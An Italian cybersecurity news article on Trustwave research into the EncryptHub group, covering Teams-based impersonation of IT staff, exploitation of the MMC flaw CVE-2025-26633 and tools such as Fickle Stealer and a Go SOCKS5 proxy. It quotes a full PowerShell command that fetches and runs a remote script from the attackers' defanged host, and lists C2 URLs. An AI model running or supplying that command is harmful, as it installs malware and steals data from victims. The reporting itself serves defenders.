Redazione RHC : 15 Agosto 2025 14:42
Il team di ricerca di Trustwave SpiderLabs ha identificato una nuova ondata di attacchi EncryptHub che combinano l’errore umano e lo sfruttamento di una vulnerabilità nella Microsoft Management Console. Gli operatori si spacciano per personale di supporto, contattano il personale tramite Microsoft Teams e poi convincono il “cliente” ad aprire l’accesso remoto ed eseguire una serie di comandi, per poi distribuire il payload del bug CVE-2025-26633, nota come MSC EvilTwin.
Parallelamente, il gruppo utilizza canali di distribuzione non standard, tra cui la piattaforma di supporto Brave, il che complica il filtraggio del traffico e l’analisi degli incidenti. I report riportano anche altri nomi dello stesso team: LARVA-208 e Water Gamayun; in precedenza, il gruppo era stato associato ad attacchi contro sviluppatori Web3 e abusi della piattaforma Steam e, a febbraio, erano 618 le organizzazioni compromesse in tutto il mondo.
Il primo passo è l’ingegneria sociale . La vittima riceve una richiesta Teams da un “addetto IT”, dopodiché l’interlocutore offre insistentemente di avviare una sessione remota e “controllare le impostazioni“. Una volta stabilita la sessione, sulla macchina viene eseguita una riga come questa:
 Sponsorizza la prossima Red Hot Cyber Conference!Il giorno Lunedì 18 maggio e martedì 19 maggio 2026 9 maggio 2026, presso il teatro Italia di Roma (a due passi dalla stazione termini e dalla metro B di Piazza Bologna), si terrà la V edizione della la RHC Conference. Si tratta dell’appuntamento annuale gratuito, creato dalla community di RHC, per far accrescere l’interesse verso le tecnologie digitali, l’innovazione digitale e la consapevolezza del rischio informatico. Se sei interessato a sponsorizzare l'evento e a rendere la tua azienda protagonista del più grande evento della Cybersecurity Italiana, non perdere questa opportunità. E ricorda che assieme alla sponsorizzazione della conferenza, incluso nel prezzo, avrai un pacchetto di Branding sul sito di Red Hot Cyber composto da Banner più un numero di articoli che saranno ospitati all'interno del nostro portale. Quindi cosa stai aspettando? Scrivici subito a [email protected] per maggiori informazioni e per accedere al programma sponsor e al media Kit di Red Hot Cyber.
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”
Questa chiamata scarica ed esegue lo script runner.ps1, che prepara un trampolino di lancio per sfruttare la vulnerabilità MMC.
Poi arriva il trucco con i file .msc doppi. Il loader crea due file di console con lo stesso nome: una copia “pulita” viene posizionata nella directory prevista e una copia dannosa viene posizionata nel percorso MUIPath, solitamente la directory en-US. Quando viene avviato lo snap-in legittimo, viene visualizzato il processo mmc.exe e, a causa del bug MSC EvilTwin, cerca prima il file con lo stesso nome in MUIPath. Di conseguenza, il sistema rileva il “mirror” da en-US ed esegue il codice degli aggressori. Sebbene la falla sia stata pubblicamente descritta come zero-day nel marzo 2025, campioni di tali file sono stati riscontrati in attacchi attivi già a febbraio; esiste una patch, ma la ricezione funziona ancora sulle stazioni non patchate.
Dopo aver disposto i doppi, runner.ps1 modifica il contenuto dello snap-in dannoso: il segnaposto htmlLoaderUrl viene sostituito con l’indirizzo del nodo di comando e controllo di EncryptHub, una stringa del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Dopo aver ricevuto il collegamento, .msc esegue la fase successiva.
Lo script build.ps1 raccoglie i “finger” di sistema e li invia a C2, registra il meccanismo di esecuzione automatica, gestisce il canale di comunicazione e attende l’esecuzione dell’attività. I comandi vengono ricevuti in forma crittografata (AES), decrittografati localmente ed eseguiti direttamente sul nodo tramite Invoke-Expression. Tra i moduli tipici c’è linfostealer PowerShell Fickle Stealer, che estrae file sensibili, informazioni sull’ambiente e dati del portafoglio crittografico.
Durante l’indagine, sono emersi ulteriori strumenti Go, con i quali gli operatori stanno gradualmente sostituendo gli script di PowerShell. Uno di questi, SilentCrystal, replica la logica del bootloader, ma è compresso in un binario nativo. Innanzitutto, viene creata una cartella di pseudo-sistema “C:WindowsSystem32” con uno spazio dopo la parola Windows, che copia visivamente la directory reale e confonde gli strumenti di sicurezza. Quindi, il campione invia un POST al server di controllo con una “chiave API” hard-coded e un nome file casuale con estensione .zip; in risposta, viene inviato un collegamento legittimo al supporto Brave.
Ai principianti non è consentito caricare allegati su questo sito, il che significa che EncryptHub ha un account con diritti di caricamento. L’archivio dal supporto Brave viene scaricato e decompresso, dopodiché il segnaposto {URI} in WF.msc viene sostituito con l’indirizzo del centro di comando. Successivamente, viene avviato lo standard .msc e, grazie a CVE-2025-26633 , la console rileva la sostituzione dalla directory “false”, eseguendo il codice richiesto.
Un’altra scoperta interessante è un “proxy bookmark” in Go con supporto SOCKS5. Senza parametri, si avvia come client, si connette all'”hosting” degli aggressori utilizzando i dettagli hardcoded nel binario e devia il traffico in un tunnel. Esiste anche una modalità server: viene caricato un file con i dati di autenticazione, viene generato automaticamente un certificato TLS autofirmato (il campo Common Name contiene la riga Reverse Socks e il nome DNS è localhost), dopodiché il processo inizia ad accettare più connessioni, parallelizzando l’elaborazione tramite goroutine. Quando viene stabilita una connessione, l’agente accede a Telegram con lo stato “start”, dove sostituisce il nome utente, il dominio dalla variabile d’ambiente USERDOMAIN, il risultato della verifica dei diritti amministrativi tramite una chiamata di sessione di rete, nonché l’IP pubblico, il geotag e il provider su richiesta a https://ipinfo.io/json . L’analisi dell’infrastruttura ha mostrato richieste di payload su hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, un altro tassello nel quadro di C2.
RedazioneIl ricercatore di sicurezza Alessandro Sgreccia, membro del team HackerHood di Red Hot Cyber, ha segnalato a Zyxel due nuove vulnerabilità che interessano diversi dispositivi della famiglia ZLD (ATP ...
La Cybersecurity and Infrastructure Security Agency (CISA) e il Multi-State Information Sharing & Analysis Center (MS-ISAC) pubblicano questo avviso congiunto sulla sicurezza informatica (CSA) in ...
Un’importante interruzione dei servizi cloud di Amazon Web Services (AWS) ha causato problemi di connessione diffusi in tutto il mondo, coinvolgendo piattaforme di grande rilievo come Snapchat, Fort...
L’azienda cinese “Unitree Robotics” ha sfidato il primato della robotica statunitense con il lancio del suo umanoide H2 “Destiny Awakening”. L’umanoide unisce la forma umana a movimenti so...
Il 20 ottobre 2025 segna un anniversario importante per la storia dell’informatica: il processore Intel 80386, noto anche come i386, celebra il suo 40° compleanno. Ed è un compleanno importante! L...
